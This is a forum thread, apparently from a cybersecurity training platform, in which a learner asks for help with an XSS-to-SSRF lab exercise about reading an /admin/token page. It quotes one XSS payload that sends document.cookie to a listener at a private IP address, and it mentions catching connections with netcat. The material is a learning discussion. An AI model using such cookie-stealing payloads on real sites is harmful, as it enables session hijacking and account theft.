Forum Discussion

shubham's avatar
shubham
Icon for Bronze I rankBronze I
6 months ago
Solved

Cross-Site Scripting: Ep.6 – Further Exploitation

I was stuck in one question looking for HINT. Extend the XSS vulnerability to view the contents of the /admin/token page with SSRF.
help & support
  • CyberSharpe's avatar
    CyberSharpe
    5 months ago

    johndoe321I changed the script to a different port to the one being bombarded and did another NC listener on that different port. Roled right in. 

KieranRowley's avatar
KieranRowley
Icon for Community Manager rankCommunity Manager
6 months ago

Hi shubham welcome to The Human Connection!

Please can you provide some detail of the steps you have already taken so that your fellow community members are able to assist you?

shubham's avatar
shubham
Icon for Bronze I rankBronze I
6 months ago

Thanks for welcome.

So I tire using netcat with the payload in message to make a reverse connection

Payload:<img src=xss onload="this.src='http://10.102.181.168:5556/admin/token?'+document.cookie;this.removeAttribute('onerror');"/>

  • NyePrior's avatar
    NyePrior
    Icon for Immerser rankImmerser
    5 months ago

    Hi shubham 👋 have another look at the "XSS and SSRF" section of the Briefing panel. You'll need to use a different payload than this.